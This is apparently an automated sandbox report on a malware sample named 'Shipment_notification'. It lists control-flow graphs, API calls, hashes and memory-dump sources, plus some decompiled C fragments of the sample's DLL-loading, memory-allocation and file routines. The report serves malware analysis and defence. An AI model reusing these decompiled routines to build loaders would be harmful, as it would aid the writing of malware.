                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: f647310e43657a3cdf0abd4a4295a46af56fedc57ba8ec2fb48d2ced260ab358
                                                                                • Instruction ID: a5c0f93ec0131e78795ae2e7412ae734628f17fa2cec5595ec7d30760ac29d11
                                                                                • Opcode Fuzzy Hash: f647310e43657a3cdf0abd4a4295a46af56fedc57ba8ec2fb48d2ced260ab358
                                                                                • Instruction Fuzzy Hash: 3621C4B59002099FDB10CFAAD984ADEBFF8FB48320F14841AE959A7310D374A944DFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 857 a793d8-a7a4d0 859 a7a4d2-a7a4d5 857->859 860 a7a4d8-a7a507 LoadLibraryExW 857->860 859->860 861 a7a510-a7a52d 860->861 862 a7a509-a7a50f 860->862 862->861
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7A2E9,00000800,00000000,00000000), ref: 00A7A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 7371bf71a7074889828d7b8203048d797cb56ac3d04561e0c0c4b07cf9dc7f38
                                                                                • Instruction ID: f7d981ad6fae6e6fd51d998a5000d56742d6f787e5128b65344731308c994825
                                                                                • Opcode Fuzzy Hash: 7371bf71a7074889828d7b8203048d797cb56ac3d04561e0c0c4b07cf9dc7f38
                                                                                • Instruction Fuzzy Hash: A311E4B6D002099FDB10CF9AC848AEEFBF4EB98710F14C42AD519B7600D3B5A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 865 a7a488-a7a4d0 866 a7a4d2-a7a4d5 865->866 867 a7a4d8-a7a507 LoadLibraryExW 865->867 866->867 868 a7a510-a7a52d 867->868 869 a7a509-a7a50f 867->869 869->868
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7A2E9,00000800,00000000,00000000), ref: 00A7A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: d79d075d1bd6a97eec0e7461d3df3a0d3d5406efb1c610194ebee015691f4e85
                                                                                • Instruction ID: d73043f54f793b5bd6ed33b6091022a06f08f2d7d1f4c7161588ac9025b170e3
                                                                                • Opcode Fuzzy Hash: d79d075d1bd6a97eec0e7461d3df3a0d3d5406efb1c610194ebee015691f4e85
                                                                                • Instruction Fuzzy Hash: 2911F6B6D002099FDB10CF9AD888ADEFBF4EB98710F14842AD819A7600D375A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 872 a7a208-a7a248 873 a7a250-a7a27b GetModuleHandleW 872->873 874 a7a24a-a7a24d 872->874 875 a7a284-a7a298 873->875 876 a7a27d-a7a283 873->876 874->873 876->875
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7A26E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: cb7a4e46ec309fb551e4ffd14c7b06e1bd818335f4602cd632fbf59ad3168ece
                                                                                • Instruction ID: f56266b7b81f074d265839753b788dd4c7d8bf93660071ac659d7cf08496f7b9
                                                                                • Opcode Fuzzy Hash: cb7a4e46ec309fb551e4ffd14c7b06e1bd818335f4602cd632fbf59ad3168ece
                                                                                • Instruction Fuzzy Hash: 711110B2C006099FCB10CF9AC844ADEFBF4AF88324F10C52AD429A7610D379A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7fe659a3fec4bebac3381c0d0d2638e4867a0f99840fbcf53303fbbd28a1b6b9
                                                                                • Instruction ID: e494c9f7a1685ae8480895c4c5b5e7fdd9dd08c2a0b403572561ea579e92edc1
                                                                                • Opcode Fuzzy Hash: 7fe659a3fec4bebac3381c0d0d2638e4867a0f99840fbcf53303fbbd28a1b6b9
                                                                                • Instruction Fuzzy Hash: 472125B5504240EFDB05DF14D9C0B56BF65FB98324F24C669E80A0F206C336E886DBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335115241.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a2d000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335015871.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a1d000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:4.3%
                                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                                Signature Coverage:4.7%
                                                                                Total number of Nodes:639
                                                                                Total number of Limit Nodes:79
29859->29885 29860->29813 29861 41e6d3 2 API calls 29863 4099fd 29861->29863 29862->29861 29863->29860 29864 41df53 LdrLoadDll 29863->29864 29865 409a62 29864->29865 29865->29860 29889 41df93 29865->29889 29867 409ac6 29867->29860 29868 4191a3 8 API calls 29867->29868 29869 409b1b 29868->29869 29869->29813 29871 4097f2 29870->29871 29872 409708 29870->29872 29871->29844 29872->29871 29873 4191a3 8 API calls 29872->29873 29874 409775 29873->29874 29875 420143 2 API calls 29874->29875 29876 40979c 29874->29876 29875->29876 29876->29844 29878 40987d 29877->29878 29879 40cee3 LdrLoadDll 29878->29879 29880 409898 29879->29880 29881 4195b3 LdrLoadDll 29880->29881 29882 4098b0 29881->29882 29883 4098cc 29882->29883 29884 4098b9 PostThreadMessageW 29882->29884 29883->29859 29884->29883 29886 410316 29885->29886 29892 41e0d3 29886->29892 29890 41dfaf 29889->29890 29891 41f213 LdrLoadDll 29889->29891 29890->29867 29891->29890 29893 41f213 LdrLoadDll 29892->29893 29894 41e0ef 29893->29894 29897 1b29840 LdrInitializeThunk 29894->29897 29895 410341 29895->29859 29897->29895 29898->29741 29900 41e21f 29899->29900 29901 41f213 LdrLoadDll 29899->29901 29904 1b299a0 LdrInitializeThunk 29900->29904 29901->29900 29902 410191 29902->29747 29902->29748 29904->29902 29905->29753 29906->29758 29907->29763

                                                                                Control-flow Graph

                                                                                control_flow_graph 485 40cee3-40ceff 486 40cf07-40cf0c 485->486 487 40cf02 call 420ee3 485->487 488 40cf12-40cf20 call 421403 486->488 489 40cf0e-40cf11 486->489 487->486 492 40cf30-40cf41 call 41f783 488->492 493 40cf22-40cf2d call 421683 488->493 498 40cf43-40cf57 LdrLoadDll 492->498 499 40cf5a-40cf5d 492->499 493->492 498->499
                                                                                C-Code - Quality: 93%
                                                                                			E0040CEE3(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                				char* _v8;
                                                                                				struct _EXCEPTION_RECORD _v12;
                                                                                				struct _OBJDIR_INFORMATION _v16;
                                                                                				char _v536;
                                                                                				void* _t15;
                                                                                				struct _OBJDIR_INFORMATION _t17;
                                                                                				struct _OBJDIR_INFORMATION _t18;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				void* _t32;
                                                                                
                                                                                				_v8 =  &_v536;
                                                                                				_t15 = E00420EE3( &_v12, 0x104, _a8);
                                                                                				_t31 = _t30 + 0xc;
                                                                                				if(_t15 != 0) {
                                                                                					_t17 = E00421403(__eflags, _v8);
                                                                                					_t32 = _t31 + 4;
                                                                                					__eflags = _t17;
                                                                                					if(_t17 != 0) {
                                                                                						E00421683( &_v12, 0);
                                                                                						_t32 = _t32 + 8;
                                                                                						asm("les ecx, [eax]");
                                                                                					}
                                                                                					_t18 = E0041F783(_v8);
                                                                                					_v16 = _t18;
                                                                                					__eflags = _t18;
                                                                                					if(_t18 == 0) {
                                                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                						return _v16;
                                                                                					}
                                                                                					return _t18;
                                                                                				} else {
                                                                                					return _t15;
                                                                                				}
                                                                                			}














                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 08d05b120cc95a7b7398adf638b707615c4997d63fae75d0ade3ba13be0a099c
                                                                                • Instruction ID: cc44215d3469fb3bd172b71124322f013a9a41121c6daa627780661158093a1d
                                                                                • Opcode Fuzzy Hash: 08d05b120cc95a7b7398adf638b707615c4997d63fae75d0ade3ba13be0a099c
                                                                                • Instruction Fuzzy Hash: 0C0156B1E0010DA7DB10DBE5DC41FDEB3789B54308F0041A6E90897281F534EB588795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 43fd8091fa23c6cd7930d1a86cfc899ac6fa1b37a1a6fec324ef581b9600c365
                                                                                • Instruction ID: ff924501c7798e13b9855206034707cdc2e1d969fcbcfcb072c3ab56af968a54
                                                                                • Opcode Fuzzy Hash: 43fd8091fa23c6cd7930d1a86cfc899ac6fa1b37a1a6fec324ef581b9600c365
                                                                                • Instruction Fuzzy Hash: 9F012CB6604149AFCB14DF98E881CEB73A9EF88314B14865DFD1C97202C635E861CBB4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                • Instruction ID: 28ed42536b8ae6d539176f91f8009f5d4e4c6ca2a7512c41f4953ace4a2a2ce5
                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                • Instruction Fuzzy Hash: 94F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 16%
                                                                                			E0041E64E(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                				void* _t20;
                                                                                				void* _t30;
                                                                                				intOrPtr* _t31;
                                                                                				void* _t33;
                                                                                
                                                                                				asm("adc ch, ah");
                                                                                				_t4 = _a4 + 0xa74; // 0xa76
                                                                                				_t31 = _t4;
                                                                                				E0041F213( *((intOrPtr*)(_a4 + 0x14)), _t15, _t31,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a, _t30);
                                                                                				_t20 =  *((intOrPtr*)( *_t31))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t33); // executed
                                                                                				return _t20;
                                                                                			}








                                                                                APIs
                                                                                • NtReadFile.NTDLL(004194D3,004149A4,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A4,004194D3,00000002,00000000), ref: 0041E698
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 98c32700c571c49239a77221e6646b3ecb99fb0c00bd572aadebc5af7cdc358a
                                                                                • Instruction ID: e4a79c653669e880bb12197b3ccb4e5e057014e4b39e99fdaea623c3d5a13fe2
                                                                                • Opcode Fuzzy Hash: 98c32700c571c49239a77221e6646b3ecb99fb0c00bd572aadebc5af7cdc358a
                                                                                • Instruction Fuzzy Hash: 45F0F4B6204108AFCB14DF99DC84EEB77A9EF8C314F058248BE4D97241C630E811CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtReadFile.NTDLL(004194D3,004149A4,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A4,004194D3,00000002,00000000), ref: 0041E698
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                • Instruction ID: 3396cf3d00253785fe46cccb375f18d1b035e4a929d0b0b67bfdf3e01cbb23bd
                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                • Instruction Fuzzy Hash: 94F0AFB6204208ABCB14DF99DC85EEB77ADAF8C754F118259BA0DA7241D630E8118BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 73cead742a487795881431c3274d451430c9a1e0f5eacf914f6006a8be199b3b
                                                                                • Instruction ID: 126e762613f4bcff93355a323de4e2b8822976fcfef5a5571657ba109fa4f598
                                                                                • Opcode Fuzzy Hash: 73cead742a487795881431c3274d451430c9a1e0f5eacf914f6006a8be199b3b
                                                                                • Instruction Fuzzy Hash: 9BF030B62401146FCB15DF89DC40EE7376DEF88714F118259FA1997291C634E812CBB4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                • Instruction ID: b3982775e90bd412a0d9a94dd5c17af1038dea2d1a93f09179e9e501fcf7fea0
                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                • Instruction Fuzzy Hash: FAF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F811CBB4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL(004102E8,00000000,?,004102E8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                • Instruction ID: aa7c47011013ccb3794a43389b7bee8dbfc91bdf6e1158d0c5e3fd24ced1ae8f
                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                • Instruction Fuzzy Hash: 26D0C732604204ABD620EBE8DC89FC73BACDF48620F0080A9BA0C5B242C230FA0086E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
